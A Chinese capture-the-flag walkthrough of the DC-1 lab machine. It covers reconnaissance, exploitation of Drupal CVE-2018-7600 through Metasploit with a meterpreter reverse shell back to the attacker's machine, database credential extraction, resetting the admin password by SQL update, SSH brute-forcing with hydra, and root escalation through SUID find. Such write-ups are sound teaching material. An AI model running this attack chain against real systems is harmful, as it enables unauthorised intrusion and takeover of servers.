DC1靶场渗透流程(超详细)

靶机页面

信息收集

• 查看DC1的IP地址

  查看DC1的MAC地址为00:0C:29:60:07:4F，然后用nmap扫描存活主机，发现DC1的MAC地址对应的IP为192.168.175.148

  

• 靶机的web页面

  

• 扫描DC1开启的端口

  ┌──(kali💋kali)-[~]
  └─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.148
  Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
  Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-30 10:57 EDT
  Nmap scan report for 192.168.175.148
  Host is up (0.0012s latency).
  Not shown: 65531 closed ports
  PORT      STATE SERVICE VERSION
  22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
  | ssh-hostkey: 
  |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
  |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
  |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
  80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
  |_http-generator: Drupal 7 (http://drupal.org)
  | http-robots.txt: 36 disallowed entries (15 shown)
  | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
  | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
  | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
  |_/LICENSE.txt /MAINTAINERS.txt
  |_http-server-header: Apache/2.2.22 (Debian)
  |_http-title: Welcome to Drupal Site | Drupal Site
  111/tcp   open  rpcbind 2-4 (RPC #100000)
  | rpcinfo: 
  |   program version    port/proto  service
  |   100000  2,3,4        111/tcp   rpcbind
  |   100000  2,3,4        111/udp   rpcbind
  |   100000  3,4          111/tcp6  rpcbind
  |   100000  3,4          111/udp6  rpcbind
  |   100024  1          41137/udp   status
  |   100024  1          44638/tcp   status
  |   100024  1          46632/udp6  status
  |_  100024  1          53040/tcp6  status
  44638/tcp open  status  1 (RPC #100024)
  MAC Address: 00:0C:29:60:07:4F (VMware)
  Device type: general purpose
  Running: Linux 3.X
  OS CPE: cpe:/o:linux:linux_kernel:3
  OS details: Linux 3.2 - 3.16
  Network Distance: 1 hop
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  ​
  TRACEROUTE
  HOP RTT     ADDRESS
  1   1.16 ms 192.168.175.148
  ​
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

  端口	状态	服务	版本
  22	open	ssh	OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
  80	open	http	Apache httpd 2.2.22 ((Debian))
  111	open	rpcbind	2-4 (RPC #100000)
  44638	open	status	1 (RPC #100024)

• web应用指纹信息

  

  OS	Linux 3.x
  Server	Apache/2.2.22 (Debian)
  X-Powered-By	PHP/5.4.45-0+deb7u14

  这里发现基于Drupal 7之上的，所以用专用工具扫描器droopescan对网站扫描

• droopescan扫描

  ┌──(kali💋kali)-[~/tools/droopescan]
  └─$ ./droopescan scan drupal -u http://192.168.175.148                                                                       1 ⨯
  [+] Plugins found:                                                              
      ctools http://192.168.175.148/sites/all/modules/ctools/
          http://192.168.175.148/sites/all/modules/ctools/LICENSE.txt
          http://192.168.175.148/sites/all/modules/ctools/API.txt
      views http://192.168.175.148/sites/all/modules/views/
          http://192.168.175.148/sites/all/modules/views/README.txt
          http://192.168.175.148/sites/all/modules/views/LICENSE.txt
      profile http://192.168.175.148/modules/profile/
      php http://192.168.175.148/modules/php/
      image http://192.168.175.148/modules/image/
  ​
  [+] Themes found:
      seven http://192.168.175.148/themes/seven/
      garland http://192.168.175.148/themes/garland/
  ​
  [+] Possible version(s):
      7.22
      7.23
      7.24
      7.25
      7.26
  ​
  [+] Possible interesting urls found:
      Default admin - http://192.168.175.148/user/login
  ​
  [+] Scan finished (0:08:14.470190 elapsed)
  ​

• 漏洞扫描报告

  发现存在如下漏洞，存在CVE-2014-3704和CVE-2018-7600

  序号	Vuln
  1	Drupal Core SQL Injection Vulnerability CVE-2014-3704
  2	Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)CVE-2018-7600
  3	Sensitive File Disclosure (HTTP)
  4	Cleartext Transmission of Sensitive Information via HTTP
  5	SSH Weak Encryption Algorithms Supported

渗透流程

• CVE-2018-7600

  可以运用远程代码执行漏洞进行Getshell，也可以直接用MSF Getshell，这里用MSF辅助渗透

  使用 search drupal 搜索相关的漏洞利用模块

  

  利用2018年的那个cve进行Getshell，使用use 1装载模块进行渗透

  msf6 > use 1
  [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
  msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 
  ​
  Module options (exploit/unix/webapp/drupal_drupalgeddon2):
  ​
     Name         Current Setting  Required  Description
     ----         ---------------  --------  -----------
     DUMP_OUTPUT  false            no        Dump payload command output
     PHP_FUNC     passthru         yes       PHP function to execute
     Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
     RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
     RPORT        80               yes       The target port (TCP)
     SSL          false            no        Negotiate SSL/TLS for outgoing connections
     TARGETURI    /                yes       Path to Drupal install
     VHOST                         no        HTTP server virtual host
  ​
  ​
  Payload options (php/meterpreter/reverse_tcp):
  ​
     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
     LPORT  4444             yes       The listen port
  ​
  ​
  Exploit target:
  ​
     Id  Name
     --  ----
     0   Automatic (PHP In-Memory)
  ​
  ​
  msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.175.148
  rhosts => 192.168.175.148
  msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 
  ​
  Module options (exploit/unix/webapp/drupal_drupalgeddon2):
  ​
     Name         Current Setting  Required  Description
     ----         ---------------  --------  -----------
     DUMP_OUTPUT  false            no        Dump payload command output
     PHP_FUNC     passthru         yes       PHP function to execute
     Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
     RHOSTS       192.168.175.148  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
     RPORT        80               yes       The target port (TCP)
     SSL          false            no        Negotiate SSL/TLS for outgoing connections
     TARGETURI    /                yes       Path to Drupal install
     VHOST                         no        HTTP server virtual host
  ​
  ​
  Payload options (php/meterpreter/reverse_tcp):
  ​
     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
     LPORT  4444             yes       The listen port
  ​
  ​
  Exploit target:
  ​
     Id  Name
     --  ----
     0   Automatic (PHP In-Memory)
  ​
  ​
  msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 
  ​
  [*] Started reverse TCP handler on 192.168.175.144:4444 
  [*] Executing automatic check (disable AutoCheck to override)
  [!] The service is running, but could not be validated.
  [*] Sending stage (39282 bytes) to 192.168.175.148
  [*] Meterpreter session 1 opened (192.168.175.144:4444 -> 192.168.175.148:33015) at 2023-03-30 12:09:16 -0400

  Getshell

  获取交互shell，这样稳定一些

  python -c 'import pty; pty.spawn("/bin/bash")'

  

接下来我们看看有什么文件，发现有个flag1.txt

查看flag1.txt

每个好的 CMS 都需要一个配置文件 - 你也一样。

根据提示，需要看一下drupal的配置文件，网上查找drupal的配置文件为settings.php

然后查看settings.php，发现flag2，看到数据库名为dbuser，密码为R0ck3t

www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php
​
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
​
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
​

接下来我们就连接数据库

mysql -udbuser -pR0ck3t

发现存在drupaldb这个数据库

然后发现它有个users表，猜测账户名和密码可能存在在这个表里

果然存在一个账户名为admin，但是密码为hash加密值无法利用，但可以对数据库进行用update来修改用户密码。

drupal默认使用password_hash.sh生成密码，参考文章

update users set pass="$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H";   #把users里面的所有pass的值改为$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H（解码后为admin）

接下来我们就可以进行登录了

登录进行对页面的功能进行探索，发现flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
特殊 PERMS 将有助于找到密码 - 但您需要执行该命令才能弄清楚如何获取阴影中的内容。

接着查看了home目录，发现了flag4

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?
你能用同样的方法在根目录中查找或访问标志吗？
可能但也许这并没有那么容易。或者可能是这样？

flag4提示的无头绪，但是flag3那里提示了“特殊 PERMS ”和“shadow”，于是查看/etc/shadow文件显示没权限，但是可以查看/etc/passwd,发现有个flag4用户，然后上面信息收集看到它有开22端口，那么接下来可以试试找到flag4用户的密码进行ssh连接

SSH爆破密码

这里借助hadry爆破

这里用的密码字典

hydra ssh://192.168.175.148 -l flag4 -P /usr/share/john/password/lst -vV -f -t 64 
​
#-vV显示爆破过程
#-f 爆破成功则停止后面的爆破
#-t 爆破速度

爆破出flag4的密码为orange，接下来进行ssh连接，连接成功，并查看了/etc/shadow文件看看flag4是否高权限，很遗憾显示flag4不是搞权限，接下来就要进行提权了

权限提升

获取root权限

提权思路

• 利用系统内核漏洞提权

• sudo 权限泄露

• 利用SUID 提权

但是flag3提示了 PERMS，那这里就可以利用SUID提权

什么时SUID提权呢

比如find命令，运行find命令时有SUID标识，SUID标识会继承root权限，就好比A信任B，B信任C，那么A就可以间接的信任C，信任是具有传递性的
有SUID标识的命令调用B命令运行，SUID标识的命令调用B命令期间SUID标识的命令获取root权限，B命令也获取了root权限

查找具有SUID 标识的命令

find / -perm -4000 2>/dev/null

发现有find命令具有SUID标识，所以我们就对find命令进行提权

先创建一个目录，在进行find命令提权

mkdir tacoking
find tacoking -exec /bin/sh \;   #-exec可以调用外部命令，find命令调用/bin/sh，/bin/sh具有root权限，传递给find命令，因为tacoking目录为空目录，所以它就会find一次

提权成功后进入root目录，发现有一个thefinalflag.txt,查看它即可查看最终flag

tips

因为这里是利用MSF来直接Getshell，没有展示CVE-2014-3704和CVE-2018-7600漏洞详情。大家有兴趣的可以查看这两篇文章

CVE-2014-3704

CVE-2018-7600